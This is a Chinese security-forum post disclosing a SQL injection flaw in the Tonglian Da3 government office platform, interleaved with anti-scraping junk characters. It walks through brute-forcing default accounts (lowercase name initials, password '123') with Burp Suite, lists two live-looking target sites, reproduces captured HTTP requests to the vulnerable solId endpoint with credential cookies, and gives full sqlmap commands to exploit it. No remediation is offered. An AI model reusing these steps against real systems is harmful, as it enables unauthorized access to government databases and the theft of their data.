中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]
作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

* R) c3 N" E/ B! N$ J+ U( |
8 O. P: b1 a5 ]# b

( Q% D/ c9 ^7 H: E* {

' [8 ]. P3 O) ` d y7 @8 U 平台简介: A$ j2 Q ^" L; ]) N6 c

+ ^# P* |/ w" \

% o! q; w+ u. x5 M, p: E   8 j5 W- D9 ~1 b1 ^! I/ x$ ]

3 W" @" K5 _$ ?, `: p# @

4 y& k+ a( [8 q! I4 t4 ?9 x4 A" d: S 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* G+ Z5 {% X- k! z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 Y! e. e* v6 l3 K7 }( L 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!# R7 `2 X0 A0 N. X5 [+ H- }

/ `- N7 g0 j/ _$ J1 z

6 L+ r8 ]3 d& g$ ]: D: B' S  . m4 P0 T7 B7 n* j

% c5 {5 b; Y9 R7 G5 j# w7 X

3 y* m. o7 X4 p 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 6 W3 k* \$ z S% f* i% P

7 l% O4 L6 l; a0 H

( s( C! k2 B) C" ] H6 B   ' }$ }! I6 K7 G

4 W$ a! b7 w& t# V/ ?9 d& g t' Z

0 f7 A8 K# |7 k+ H( j; v# g' @ http://1.1.1.1:7197/cap-aco/#(案例2-)" o& a. u; O) g3 r1 d8 ^

5 o- t ?1 R( k4 {% W5 ~$ h

* [* r3 k3 |# \3 r http://www.XXOO.com (案例1-官网网站); k4 D! ^9 j1 p! Z" W7 ]3 a+ O; d

3 T1 e' i8 _7 t

. _: ~, j* ~. x8 @# G  3 v& E3 h3 }3 B& _

, O+ T# T7 H6 F1 g: A/ X, s3 M

3 j, w" i1 V7 L( `; ~9 d+ w 漏洞详情:5 x) q! {) T2 g

5 E) @6 Z4 W- ^+ R+ k+ F1 ]2 d( c

& l6 c' l4 j8 \% @  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 - U" g3 i4 D4 S1 D

7 E: r: A) m! m" U# g, W; ?

, T2 }* E8 b) O1 Y      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; O- |" P8 \3 J7 M7 ~

/ v N8 t- G% |. ]) P% G- m

, I3 o' c6 y# a% A7 h' X/ r  $ K) ^1 Z8 p5 a

& M3 a) |* t9 i0 y) J" m" l

" O- i. j- i; D+ w }! ^* f/ [+ e  0 m' N! L2 X7 w6 O+ I1 P) ~" c

, C+ L" t* Z% a. Q

5 Y4 [5 v2 W4 s c- x status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:9 x! N! ]# M* U) X; @% r

* X2 S/ l7 b8 [* I2 J* w

. c H4 o* ? {# D2 d; q 1、案例1-官方网站+ [" I/ A$ ]3 s* d# d8 Z- m( ]" Z* Q& w

9 E& g# K- p) N1 h3 m

3 _2 W2 d) c: F5 B0 S% g- z. k GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 " l. D- A- K$ g, k8 C' e O( n, B

* R# ?) T1 p1 g5 X& p6 S

. h2 P6 j9 S0 ^, ~! P! \ Host: www.XXOO.com1 B3 f: t, y2 `/ N+ l

2 u( P5 z9 e& h) Q' V

2 p5 |% [0 p F q0 D; Q Proxy-Connection: Keep-Alive" H+ K4 M9 p c9 ?$ d

1 q L ?' b2 k, N

: R [% `; F' l& U" m; |& T Accept: application/json, text/javascript, */*; q=0.01 : W; _: q# o5 I5 z4 t1 Y1 p

# b# n( P# m. ]% t5 l

) S* T. z1 l1 i/ i7 _. x& g Accept-Language: zh-CN * s, N( `; Q" y" _9 O

. v% d) T3 y' J* \

: _, S* n, N, e$ H0 z: m! `6 }! X Content-Type: application/json4 ?, `9 U, X3 W, }, E$ d

/ t6 M; n: I9 `8 r$ a, Y4 ~

6 M" I4 e" w' e" o6 p8 L' [7 c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 4 \% \ w4 t ]5 g. U. ~1 _9 O

3 V! ~7 I! ~% Y8 ^2 t* X# B! {

) B! l; s3 ^ E z R; A X-Requested-With: XMLHttpRequest! h6 r- Y0 S- B0 z# I* I. F) A

4 J. f! i% c3 J) R# ]

5 w- L) c8 N) B2 c* ^/ j6 z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002+ H5 q3 n3 s/ _' a' M

! t) @' Q+ k9 {( x* m4 k! `

! K( [$ _9 u/ @0 a" j; S5 E8 V5 m, W( y Accept-Encoding: gzip, deflate, sdch * b2 y7 {! e' |! j; G1 u% k2 t

- S" M- p6 _) I8 l& t! @

. X0 \- V- p+ q3 \8 S Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e 3 r# k i+ \: q. C5 w4 i

G Q4 r U% \" Y+ r

# i; F [4 h4 N& b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:# o7 H* y$ M4 L8 J. J( D" C

6 { r- U7 f) \" |& }

" U: @+ g8 c! Z1 i) \6 w   - k) h3 r4 R) ~

9 t! A$ A7 T: L" ^0 T0 ~2 e1 z/ _ [

" i9 O6 q/ @5 f, e: M   ; A3 @. \+ M4 l" I# h3 W9 D# z5 O

, A0 |) C. c. z8 |# x( a O) s

7 o0 i' R# h7 b' N   8 O! j/ x7 X4 C" m! R

3 L" r& @/ F2 I2 g" J

" j2 }( p$ X# w, p( G+ \0 J5 d   7 a- D* q* S- I& r* i# I5 e

( l$ e. \- S t: J

& y5 }, d* x0 q" r% G   . C$ ?/ T7 W' c, E [

" i* \( Z( M) H/ q" S% M3 \! N0 @

, Y3 I# m- ] D( b 2、案例2-某天河云平台 8 C# I' p6 F3 Q( t$ D

% B$ } n3 T4 v" w' |5 j& U4 x

) s/ Y8 J% K9 c) e GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1+ N) Z/ {5 p* U, S

2 T" @9 n7 }: i0 A! K$ M

# x" c: m. o5 f Host: 1.1.1.:7197 * x- \, q: {4 Q9 F; V8 C/ ~

% D! ^8 \) g+ G5 C. [. k( N

* I; ~% ~: n) ^5 R6 L3 z& O Accept: application/json, text/javascript, */*; q=0.01. z3 W) t& D9 m, n% w0 b

, ?. A2 D5 f, ]+ D

6 }. D% X3 S7 I X-Requested-With: XMLHttpRequest 6 j8 ^: v( E/ j; f/ @' K

; D0 x( G& Z4 h3 m/ v$ _8 K; p

3 ~( A! I* G7 Q0 B( Q, Y% a User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: h; e2 G8 d+ {" D. G5 f

& w3 n+ ?2 m4 g. p9 M) D# I) H

" ^) Y; U0 t3 I! Y; \1 ~% x Content-Type: application/json3 V, ~, q7 q$ ^& `9 E8 N. y

( d3 x6 ]1 U5 T4 T' F

) r) z1 }, }- {$ y. p Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 # N* B3 E: | l9 P8 R

/ w3 J# Q, o) `9 D

6 c" e; B& Q6 X: a n/ J Accept-Language: zh-CN,zh;q=0.8 2 N: k' I }) i) q8 Y# q

6 ]! j) [! ?! @% }3 _3 w& |

/ r7 k% E$ M1 D% l2 w Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 # y& l$ |. Y4 W7 C1 `

( s; |- t# B/ E4 e

% y6 _; |/ C' P, I1 ?1 a Connection: close & b% x7 m9 i0 {

- k, p- m/ b& A; H* T

) q; X2 b# h: E6 e 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 9 b, I7 k) q& Y# ~6 K" h

2 x% D) y( O, v

4 c8 e, \; U0 v C) X" ^! ~& m   6 i; @% [9 }0 O) u

5 Q0 K/ F$ }5 m2 I' j4 A$ Q1 T- J% W

# d& F! v" f' G. y2 _4 [* L* U. B
W7 I; \, X8 s





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2